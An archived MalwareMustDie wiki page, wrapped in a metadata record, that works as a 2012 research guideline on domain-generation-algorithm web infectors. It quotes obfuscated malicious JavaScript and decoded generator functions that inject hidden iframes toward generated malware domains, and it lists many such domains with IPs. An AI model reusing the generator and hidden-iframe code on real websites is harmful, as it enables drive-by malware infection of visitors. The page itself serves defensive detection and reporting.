{
	"id": "6cf69879-7e94-4e5a-857f-2aba5120f128",
	"created_at": "2026-04-06T00:08:47.161842Z",
	"updated_at": "2026-04-10T13:12:30.343181Z",
	"deleted_at": null,
	"sha1_hash": "0f0c4de6c332598a7f3d51403ce07d8b88b19878",
	"title": "malwaremustdie/wiki/old/DGA_Research_Tips.md at 6f69c8e4a55335b6b60a23785e98087b605ddceb · unixfreaxjp/malwaremustdie",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 125789,
	"plain_text": "malwaremustdie/wiki/old/DGA_Research_Tips.md at\r\n6f69c8e4a55335b6b60a23785e98087b605ddceb ·\r\nunixfreaxjp/malwaremustdie\r\nBy unixfreaxjp\r\nArchived: 2026-04-05 15:48:36 UTC\r\n#DGA/PseudoRandom Malicious Domain Research Guideline\r\nIntroduction\r\nMost of the openly published of DGA cases solved by MalwareMustDie is compiled as a template to follow in\r\nhere.\r\nDetails\r\nContents\r\nRecognizing\r\nObfuscation\r\nGenerators\r\nDecoding and Reporting\r\nMonitoring an infection\r\nDGA Project Monitoring\r\nThis Research is Copyrighted\r\nRecognizing\r\nDGA can be spotted by a random subdomains or it's randomized parameters as per below sample of infection\r\nroutes, we often spotted them using the free hosting domain, free DDNS, free File Sharing services to camouflage\r\ntheir domain names. The usage of the .ru, .biz,.info base TLD also spotted frequently:\r\n2012-11-15 15:56:55 2 / 0 http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8 212.7.194.234\r\n2012-11-15 15:03:46 2 / 0 http://slhzpllrp.mynumber.org/geographicallyconquering.cgi?8 212.7.194.234\r\n2012-11-15 05:55:18 2 / 0 http://xflonjilx.mynumber.org/geographicallyconquering.cgi?8 212.7.194.235\r\nObfuscation\r\nAs the nature of readable javascript all of the infector using Pseudorandom/DGA code are obfuscated like:\r\nhttps://github.com/unixfreaxjp/malwaremustdie/blob/6f69c8e4a55335b6b60a23785e98087b605ddceb/wiki/old/DGA_Research_Tips.md\r\nPage 1 of 18\n\n＜script＞/*km0ae9gr6m*/window.eval(String.fromCharCode(116,114,121,123,112,114,111,116,\r\n[...]\r\n/*qhk6sa6g1c*/＜/script＞\r\nor..\r\n＜script＞var var1=true;var var2=10;var2++;var var6=0.0025;if(var6=\r\nar5-=0.022;var var6=5685;var6--}var var5=57;var var8=0;do{var var\r\nr var21=4053;if(var21＞0.038){var var17=5470;var17--;var var20=22;\r\nar var32=8980;var32--}function hae(key,mir){var var34=0.031;if(va\r\nr var42=0.009;var42+=0.004;var var43=0;var43+=0.003;var4+='cvCode\r\n　：\r\nvar8=4014;if(var8!=3947){var 
var4=21;if(var4!=0.0116){var var2\r\nar4=0.052;if(var4!=2753){var var2=true;var var3=['apt','gag']}ret\r\n var13=0.017;if(var13!=0){var var12=4296}}}} var str='';functi\r\n','has','ire'];var24++}while(var24\u003c5);return zig} str+=let\r\nr26-=5819;var var27=0.003;var27++}}}var var31=[0,70,50,30,10,20,6\r\n,got,nut){for(var var38=0;var38\u003c9;var38++){var var39=8962;var39++\r\nsr'+'c', 'h00p://'+domainName+'/in.cgi?14'); var var49=4490;var49\r\nifrm.style.visibility='hidden'; var var58='YKtHrZfxVR';\r\nThe above obfuscation mostly leads us to a second, or sometimes a third, level of obfuscation, depending on the nature of the infection; below is a snippet of the second level:\r\ntry {\r\n prototype % 2;\r\n}\r\ncatch (asd){\r\n x = 2;\r\n}\r\ntry {\r\n q = document[(x) ? \"c\" + \"r\" : 2 + \"e\" + \"a\" + \"t\" + \"e\" + \"E\" + \"l\" + \"e\" + \"m\" + ((f) ?\r\n \"e\" + \"n\" + \"t\" : \"\")](\"p\");\r\n q.appendChild(q + \"\");\r\n}\r\ncatch (fwbewe){\r\n i = 0;\r\n try {\r\n prototype * 5;\r\n }\r\n catch (z){\r\n fr = \"fromChar\";\r\n f = [510, 702, 550, 594, 580, 630, 555, 660, 160, 660, 505, 720, 580, 492, 485, 660,\r\n 500, 666, 545, 468, 585, 654, 490, 606, 570, 240, 205, 738, 50, 192, 160, 192, 160,\r\n[...]\r\n 295, 60, 160, 192, 160, 192, 160, 192, 160, 192, 625, 60, 160, 192, 160, 192, 625, 594\r\n , 485, 696, 495, 624, 200, 606, 205, 738, 625, 60, 625, 264, 160, 318, 240, 288, 205,\r\n 354];\r\n v = \"eva\";\r\n }\r\n if (v)e = window[v + \"l\"];\r\n w = f;\r\n s = [];\r\n r = String;\r\n z = ((e) ? \"Code\" : \"\");\r\n for (;\r\n 1776 - 5 + 5 \u003e i; i += 1){\r\n j = i;\r\n if (e)s = s + r[fr + ((e) ? \"Code\" : 12)]((w[j] / (5 + e(\"j%2\"))));\r\n }\r\n if (f)e(s);\r\nGenerators\r\nWe can decode the DGA logic generators below manually:\r\nType 1\r\n// This type is seen only in related PHP/WebShell/IRC-Bit based injected multilayer obfuscation\r\n var time = new Array();\r\n time['year'] = window.gd.getUTCFullYear();\r\n time['month'] = window.gd.getUTCMonth()+1;\r\n time['day'] = window.gd.getUTCDate();\r\n var d='fbcmfir.com';\r\n var months = new Array('uno', 'dve', 'thr', 'fir', 'vif', 'xes', 'ves', 'ght', 'eni', 'etn', 'lev', 'twe');\r\n var letters = new Array('a','b','c','d','e','f','g','h','j','i','k','l','m','n','o','p','q','r','s','t','u','\r\n var numbers = new Array(1,2,3,4,5,6,7,8,9);\r\n function CalculateMagicNumber(day, month, year, index)\r\n {\r\n return (((year + (index * day)) + (month ^ day) * index) + day);\r\n }\r\n var yearCh1, yearCh2, monthCh, dayCh, num;\r\n num = CalculateMagicNumber(time['day'], time['month'], time['year'], shiftIndex);\r\n yearCh1 = letters[(((time['year'] \u0026 0xAA) + num) % 63) % 26] + letters[(((time['year'] \u0026 0xAA) \u003c\u003c 2) + num) %\r\n yearCh2 = letters[((((time['year'] \u0026 0x3311) \u003e\u003e 3) + num) % 10)] + letters[((((time['year'] \u0026 0x3311) \u003e\u003e 4) +\r\n monthCh = letters[((time['month'] + num) % 25)] + letters[((time['month'] * num) % 25)];\r\n dayCh = letters[((time['day'] * 6) % 27)];\r\n timeCh = dayCh = letters[((time['day'] * num) % 24)];\r\n $a=$a.replace(d,dayCh + yearCh2 + monthCh + yearCh1 + dayCh + months[time['month'] - 1] + '.com');\r\nType 2\r\n// This one is typically seen over and over\r\nfunction nextRandomNumber(){\r\n var hi = this.seed / this.Q;\r\n var lo = this.seed % this.Q;\r\n var test = this.A * lo - this.R * hi;\r\n if (test \u003e 0){\r\n this.seed = test;\r\n }\r\n else {\r\n this.seed = test + this
.M;\r\n }\r\n return (this.seed * this.oneOverM);\r\n}\r\nfunction RandomNumberGenerator(unix){\r\n var d = new Date(unix * 1000);\r\n var s = Math.ceil(d.getHours() / 3);\r\n this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));\r\n this.A = 48271;\r\n this.M = 2147483647;\r\n this.Q = this.M / this.A;\r\n this.R = this.M % this.A;\r\n this.oneOverM = 1.0 / this.M;\r\n this.next = nextRandomNumber;\r\n return this;\r\n}\r\nfunction createRandomNumber(r, Min, Max){\r\n return Math.round((Max - Min) * r.next() + Min);\r\n}\r\nfunction generatePseudoRandomString(unix, length, zone){\r\n var rand = new RandomNumberGenerator(unix);\r\n var letters = \"qmahgwctopfjilrfpjrfcwgewheizwdw\".split('');\r\n var str = '';\r\n for (var i = 0; i \u003c length; i++){\r\n str += letters[createRandomNumber(rand, 0, letters.length - 1)];\r\n }\r\n return str + '.' + zone;\r\n}\r\nsetInterval(function (){\r\n try {\r\n if (typeof iframeWasCreated == \"undefined\"){\r\n var unix = Math.round( + new Date() / 1000);\r\n var domainName = generatePseudoRandomString(unix, 16, 'mynumber.org');\r\n ifrm = document.createElement(\"IFRAME\");\r\n ifrm.setAttribute(\"src\", \"h00p://\" + domainName + \"/in(.)cgi?14\");\r\n ifrm.style.width = \"0px\";\r\n ifrm.style.height = \"0px\";\r\n ifrm.style.visibility = \"hidden\";\r\n document.body.appendChild(ifrm);\r\n iframeWasCreated = true;\r\n }\r\nThe above type 2 code was in the end adopted and used in the infamous RunForrestRun DGA generator by the .RU malware infector group.\r\n// This type is also commonly used to infect malware sites..\r\nfunction nextRandomNumber(){\r\n var hi = this.seed / this.Q;\r\n var lo = this.seed % this.Q;\r\n var test = this.A * lo - this.R * hi;\r\n if (test \u003e 0){\r\n this.seed = test;\r\n }\r\n else 
{\r\n this.seed = test + this.M;\r\n }\r\n return (this.seed * this.oneOverM);\r\n}\r\nfunction RandomNumberGenerator(unix){\r\n var d = new Date(unix * 1000);\r\n var s = d.getHours() \u003e 12 ? 1 : 0;\r\n this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));\r\n this.A = 48271;\r\n this.M = 2147483647;\r\n this.Q = this.M / this.A;\r\n this.R = this.M % this.A;\r\n this.oneOverM = 1.0 / this.M;\r\n this.next = nextRandomNumber;\r\n return this;\r\n}\r\nfunction createRandomNumber(r, Min, Max){\r\n return Math.round((Max - Min) * r.next() + Min);\r\n}\r\nfunction generatePseudoRandomString(unix, length, zone){\r\n var rand = new RandomNumberGenerator(unix);\r\n var letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o'\r\n , 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'];\r\n var str = '';\r\n for (var i = 0; i \u003c length; i++){\r\n str += letters[createRandomNumber(rand, 0, letters.length - 1)];\r\n }\r\n return str + '.' 
+ zone;\r\n}\r\nsetTimeout(function (){\r\n try {\r\n if (typeof iframeWasCreated == \"undefined\"){\r\n iframeWasCreated = true;\r\n var unix = Math.round( + new Date() / 1000);\r\n var domainName = generatePseudoRandomString(unix, 16, 'ru');\r\n ifrm = document.createElement(\"IFRAME\");\r\n ifrm.setAttribute(\"src\", \"h00p://\" + domainName + \"/runforestrun?sid=botnet2\");\r\n ifrm.style.width = \"0px\";\r\n ifrm.style.height = \"0px\";\r\n ifrm.style.visibility = \"hidden\";\r\n document.body.appendChild(ifrm);\r\nDecoding and Reporting\r\nIt is important to keep the logic running as it is, in order to decode which scheme of infection is used; our members are advised to use the template below:\r\n=======================================\r\n#MalwareMustDie - Case NEW Pseudorandom/DGA domain infectors\r\nSuspected TDS Sutra, followed by @it4sec\r\nsupports: @unifreaxjp, @EricOpdyke\r\nTue Nov 20 15:47:35 JST 2012\r\n=======================================\r\nThe currently registered A record is x.x.x.x\r\nof the below malicious subdomains..\r\n//script result...\r\naaaaa.bbbb.ccc,37.72.188.88,\r\nbbbbb.bbbb.ccc,37.72.188.88,\r\n[...]\r\n// dig confirmation...\r\n;; ANSWER SECTION:\r\nmwwczodfrhwzmetq.mynumber.org. 31 IN A 37.72.188.88\r\ngdrlfielgcoiccjw.mynumber.org. 31 IN A 37.72.188.88\r\ntwtwclwgrdwwpmol.mynumber.org. 31 IN A 37.72.188.88\r\nfjhhtmjlhpdwdwhf.mynumber.org. 31 IN A 37.72.188.88\r\nljimjhilrwgcffgp.mynumber.org. 31 IN A 37.72.188.88\r\ntcpdmfppwgphghej.mynumber.org. 31 IN A 37.72.188.88\r\n;; AUTHORITY SECTION:\r\nmynumber.org. 2011 IN NS ns3.changeip.org.\r\nmynumber.org. 2011 IN NS ns2.changeip.org.\r\nmynumber.org. 2011 IN NS ns1.changeip.org.\r\n;; ADDITIONAL SECTION:\r\nns1.changeip.org. 1653 IN A 204.16.173.31\r\nns2.changeip.org. 1822 IN A 204.16.175.12\r\nns3.changeip.org. 
1822 IN A 208.85.240.112\r\nns3.changeip.org. 1822 IN A 204.16.175.12\r\n//under the VPS service below (whois)\r\ninetnum: 37.72.188.0 - 37.72.188.255\r\nnetname: MNT-WEBEXXPURTS\r\ndescr: Virtual Service Provider\r\ncountry: US\r\nadmin-c: JA3035-RIPE\r\ntech-c: JA3035-RIPE\r\nstatus: ASSIGNED PA\r\nmnt-by: MNT-WEBEXXPURTS\r\nsource: RIPE # Filtered\r\nmnt-routes: GLESYS-MNT\r\nremarks: INFRA-AW\r\nperson: Jay Anderson\r\naddress: 100 Technology Dr\r\naddress: Asheville\r\naddress: North Carolina\r\naddress: 28803\r\nmnt-by: MNT-WEBEXXPURTS\r\nremarks: USA\r\nphone: +14086774567\r\nnic-hdl: JA3035-RIPE\r\nsource: RIPE # Filtered\r\n// REFERENCING IS A MUST!\r\n// reference of that IP is not good, another infector URL detected\r\n// Base: http://urlquery.net/report.php?id=179086\r\n----------------------------------------------------------------------------\r\nDate (CET) Rep/Alerts/IDS URL IP\r\n----------------------------------------------------------------------------\r\n2012-11-17 22:26:06 / 2 / 0 http://mwwczodfrhwzmetq.mynumber.org/in.cgi?14 37.72.188.88 [Esto\r\n↑\r\n//urlQuery Alerts Detected a Dynamic DNS URL\r\n//Detected SutraTDS URL pattern\r\n//Same ASN also has other TDS Sutra infectors:\r\n2012-11-15 09:24:39 1 / 2 http://creofdjwwpgdteoc.ru/in.cgi?17 --\u003e http://urlquery.net/report.php?id=1\r\n2012-11-15 08:56:12 1 / 2 http://mwcwcrhwwmlwhqdz.ru/in.cgi?17 --\u003e http://urlquery.net/report.php?id=1\r\n// PseudoRandom/DGA Generator logic used (A MUST)...\r\nhttp://pastebin.com/raw.php?i=EAHfMktC\r\n// Raw data checked:\r\nDATE TIME CRACKED URL\r\n-------------------------------------------------------\r\nThu Jan 01 01:00:00 GMT-0500 (Eastern Standard Time) h00p://pheorwhhtffpfcrz.mynumber.org/in.cgi?14\r\nThu Jan 01 04:00:00 GMT-0500 (Eastern Standard Time) h00p://rplfthpdrifjzrwm.mynumber.org/in.cgi?14\r\nThu 
Jan 01 07:00:00 GMT-0500 (Eastern Standard Time) h00p://wfqgawgahlwwewjp.mynumber.org/in.cgi?14\r\nThu Jan 01 10:00:00 GMT-0500 (Eastern Standard Time) h00p://wwricgrzwriwzlpc.mynumber.org/in.cgi?14\r\nThu Jan 01 13:00:00 GMT-0500 (Eastern Standard Time) h00p://iiwhjwldchjzwwwh.mynumber.org/in.cgi?14\r\nThu Jan 01 16:00:00 GMT-0500 (Eastern Standard Time) h00p://daeocmcawpzpjizp.mynumber.org/in.cgi?14\r\nThu Jan 01 19:00:00 GMT-0500 (Eastern Standard Time) h00p://ajlgqgeodcifefje.mynumber.org/in.cgi?14\r\nThu Jan 01 22:00:00 GMT-0500 (Eastern Standard Time) h00p://wjqdfrretghwhpwr.mynumber.org/in.cgi?14\r\n[...]\r\n// Template source:\r\n#MalwareMustDie | Case Pseudorandom/DGA domain infectors..\r\n@EricOpdyke @unixfreaxjp supporting to: @it4sec's http://ondailybasis.com/blog/?p=1668\r\nSample Published Reports\r\nhttp://pastebin.com/raw.php?i=BXYvTK8Q\r\nhttp://pastebin.com/raw.php?i=S0cs87P1\r\nhttp://pastebin.com/raw.php?i=VvQAk9m1\r\n(See our Pastebin for more...)\r\nMonitoring an infection\r\nIt is important to keep on monitoring the DGA after it is spotted. 
The points of monitoring are:\r\n * Which domains are up (WHOIS + A RECORD)?\r\n * Which ones are actually blocked?\r\n * Which ones are up but not weaponized (WHOIS - A RECORD)?\r\n * Monitoring the status of the registrar record in WHOIS\r\nBelow is a sample of our reporting/monitoring on published cases:\r\n==========================================================\r\n#MalwareMustDie - DGA/Pseudorandom Case: RunForrestRun/JS\r\nRaw: http://pastebin.com/raw.php?i=9zQt23hv\r\nPS: the pseudorandom generator emitted duplicate domains,\r\nso all domains in this report will be doubled too...\r\n===========================================================\r\n=========================\r\nALREADY BLOCKED\r\n=========================\r\n
BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\nwfzzcwgghwffwjpr.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\nopfwcwlowhzdizia.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\njgaihfhgjlqhjwff.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\nrzcjlpfzfjjwpjwi.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\noqcrhfchlwzwhzcq.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\noqcrhfchlwzwhzcq.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\nghwjfwfcwtdawjge.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\nwwjfgirarcmiwclw.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\nicqedhlgjwpcwfip.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\nopfwcwlowhzdizia.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\njgaihfhgjlqhjwff.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\nrzcjlpfzfjjwpjwi.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\noqcrhfchlwzwhzcq.info,,DUMMYSECONDARY.PLEASECONTACTSUPPORT.COM, BLOCKEDFORABUSE.PLEASECONTACTSUPPORT.COM\r\n=======================================\r\nREGISTERED DOMAINS WITHOUT A RECORDS\r\n======================================\r\nriwecppzhljhiqjc.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\njrjhjwipwdihtlwi.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\ncwwtcajagocwfpcw.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nedprhrldwjwgrwwe.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, 
WEST.INAPPLE.COM\r\nedprhrldwjwgrwwe.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nriwecppzhljhiqjc.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\njrjhjwipwdihtlwi.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\ncwwtcajagocwfpcw.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nedprhrldwjwgrwwe.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nhttps://github.com/unixfreaxjp/malwaremustdie/blob/6f69c8e4a55335b6b60a23785e98087b605ddceb/wiki/old/DGA_Research_Tips.md\r\nPage 9 of 18\n\nedprhrldwjwgrwwe.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\newcgcgwgofpcczth.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nzjwioaedtwtejajg.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nerwwmafwpwwmpgjh.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nweewfpjjtjrgrcht.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nmgpcgicwhwzezgpj.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\ngfhidjejiwjdgfda.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nlidgegrragewhdqt.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nfrjwdrfjwwwreife.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nrwgwziiwgrwciwct.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nrwgwziiwgrwciwct.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nwdgffiapcrhpgcch.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nwwirfwqfiwizzgtt.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nijdewiritmhcqhcz.info,,EAST.INAPPLE.COM, 
NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nwricfffjewcmricg.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nwcrigpfcprwclcia.info,,NS1.SILENTDNS.COM, NS2.SILENTDNS.COM\r\nappejljrdtjqgdff.info,,NS1.SILENTDNS.COM\r\nwfiioccfoijpqhpr.info,,NS1.SILENTDNS.COM\r\nowrgrdtrfggfwjig.info,,NS1.SILENTDNS.COM\r\nowrgrdtrfggfwjig.info,,NS1.SILENTDNS.COM\r\nawjmfoihgzfgtgpi.info,,NS1.SILENTDNS.COM\r\nwdwwjrqacqdecfjw.info,,NS1.SILENTDNS.COM\r\nowrlcpcpgfiwhcww.info,,NS1.SILENTDNS.COM\r\njjwcrdfwhhtpwotf.info,,NS1.SILENTDNS.COM\r\nrjehlwpqjzrcfewl.info,,NS1.SILENTDNS.COM\r\nrjehlwpqjzrcfewl.info,,NS1.SILENTDNS.COM\r\njefaglhpiogipgpz.info,,NS1.SILENTDNS.COM\r\nggjrhwfecfwogffo.info,,NS1.SILENTDNS.COM\r\nhfgwlfpizfwottcr.info,,EAST.INAPPLE.COM, NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nclmrcwwhfdqghjgl.info,,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nclmrcwwhfdqghjgl.info,,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\neffehilmhgctrpia.info,,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\nhhcdlfccqftweeew.info,,EAST.INAPPLE.COM NORTH.INAPPLE.COM, SOUTH.INAPPLE.COM, WEST.INAPPLE.COM\r\n----------------------------------------------------------------\r\n↓ H I G H L Y S U S P E C T E D M A L W A R E H O S T S\r\n S O R T E D P E R I P A D D R E S S\r\n S a t N o v 3 1 6 : 4 1 : 1 9 J S T 2 0 1 2\r\n----------------------------------------------------------------\r\n==================\r\n188.40.204.64\r\nhttps://github.com/unixfreaxjp/malwaremustdie/blob/6f69c8e4a55335b6b60a23785e98087b605ddceb/wiki/old/DGA_Research_Tips.md\r\nPage 10 of 
18\n\n==================\r\nfipdipirewfiihrf.info,188.40.204.64,\r\nrrigjzewrwjiwdci.info,188.40.204.64,\r\nfipdipirewfiihrf.info,188.40.204.64,\r\nrrigjzewrwjiwdci.info,188.40.204.64,\r\n==================\r\n91.233.244.102\r\n==================\r\nigicpiipggljcwaf.info,91.233.244.102,DNS1.WEBDRIVE.RU, DNS2.WEBDRIVE.RU\r\nigicpiipggljcwaf.info,91.233.244.102,DNS1.WEBDRIVE.RU, DNS2.WEBDRIVE.RU\r\n==================\r\n208.91.197.193\r\n==================\r\necwwmwiorimiwjpg.info,208.91.197.193,\r\nrjwweohfoepeggaj.info,208.91.197.193,\r\necwwmwiorimiwjpg.info,208.91.197.193,SK.S5.ANS1.NS112.ZTOMY.COM, SK.S5.ANS2.NS112.ZTOMY.COM\r\nrjwweohfoepeggaj.info,208.91.197.193,SK.S5.ANS1.NS112.ZTOMY.COM, SK.S5.ANS2.NS112.ZTOMY.COM\r\necwwmwiorimiwjpg.info,208.91.197.193,SK.S5.ANS1.NS112.ZTOMY.COM,SK.S5.ANS2.NS112.ZTOMY.COM\r\nrjwweohfoepeggaj.info,208.91.197.193,SK.S5.ANS1.NS112.ZTOMY.COM,SK.S5.ANS2.NS112.ZTOMY.COM\r\n==================\r\n62.116.181.25\r\n==================\r\nmrjztgcwfjzfggre.info,62.116.181.25,\r\nmrjztgcwfjzfggre.info,62.116.181.25,\r\ngcggtfilfgiiwdfw.info,62.116.181.25,\r\ncegprccwldejfwfw.info,62.116.181.25,\r\npmjjzpcerwcagtpc.info,62.116.181.25,\r\nitwgpwjifrzoajco.info,62.116.181.25,\r\nrfhwhftjormwjzfj.info,62.116.181.25,\r\nwhwfcjiwplgmriew.info,62.116.181.25,\r\nfzrttttthlzcewjd.info,62.116.181.25,\r\nrhofafmfwfgwwgpw.info,62.116.181.25,\r\nmrjztgcwfjzfggre.info,62.116.181.25,\r\ngcggtfilfgiiwdfw.info,62.116.181.25,\r\ncegprccwldejfwfw.info,62.116.181.25,\r\npmjjzpcerwcagtpc.info,62.116.181.25,\r\nitwgpwjifrzoajco.info,62.116.181.25,\r\nrfhwhftjormwjzfj.info,62.116.181.25,\r\nwhwfcjiwplgmriew.info,62.116.181.25,\r\nhttps://github.com/unixfreaxjp/malwaremustdie/blob/6f69c8e4a55335b6b60a23785e98087b605ddceb/wiki/old/DGA_Research_Tips.md\r\nPage 11 of 
18\n\nfzrttttthlzcewjd.info,62.116.181.25,\r\nrhofafmfwfgwwgpw.info,62.116.181.25,\r\nmrjztgcwfjzfggre.info,62.116.181.25,\r\ngcggtfilfgiiwdfw.info,62.116.181.25,\r\ncegprccwldejfwfw.info,62.116.181.25,\r\npmjjzpcerwcagtpc.info,62.116.181.25,\r\nitwgpwjifrzoajco.info,62.116.181.25,\r\nrfhwhftjormwjzfj.info,62.116.181.25,\r\nwhwfcjiwplgmriew.info,62.116.181.25,\r\nfzrttttthlzcewjd.info,62.116.181.25,\r\nrhofafmfwfgwwgpw.info,62.116.181.25,\r\nifgmhdqcfajfftqz.info,62.116.181.25,\r\ndwpoeejplrhfegwr.info,62.116.181.25,\r\nwwcwpjwrhzwwrfjf.info,62.116.181.25,\r\nidwfgjjgeorhigor.info,62.116.181.25,\r\ndwrredzpwpicfrch.info,62.116.181.25,\r\nalmmizjrdhepgfop.info,62.116.181.25,\r\nwffcrhplrgcwpwtg.info,62.116.181.25,\r\nohclwehzcigwmhce.info,62.116.181.25,\r\njqerhfpghehlghif.info,62.116.181.25,\r\nifgmhdqcfajfftqz.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\ndwpoeejplrhfegwr.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\nwwcwpjwrhzwwrfjf.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\nidwfgjjgeorhigor.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\nidwfgjjgeorhigor.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\ndwrredzpwpicfrch.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\nalmmizjrdhepgfop.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\nwffcrhplrgcwpwtg.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\nohclwehzcigwmhce.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\njqerhfpghehlghif.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\njqerhfpghehlghif.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\nifgmhdqcfajfftqz.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\ndwpoeejplrhfegwr.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\nwwcwpjwrhzwwrfjf.info,62.116.181.25,NS1.PARKINGCREW.NET, NS2.PARKINGCREW.NET\r\nidwfgjjgeorhigor.info,62.116.181.25,NS1.PARKINGCREW.NET, 
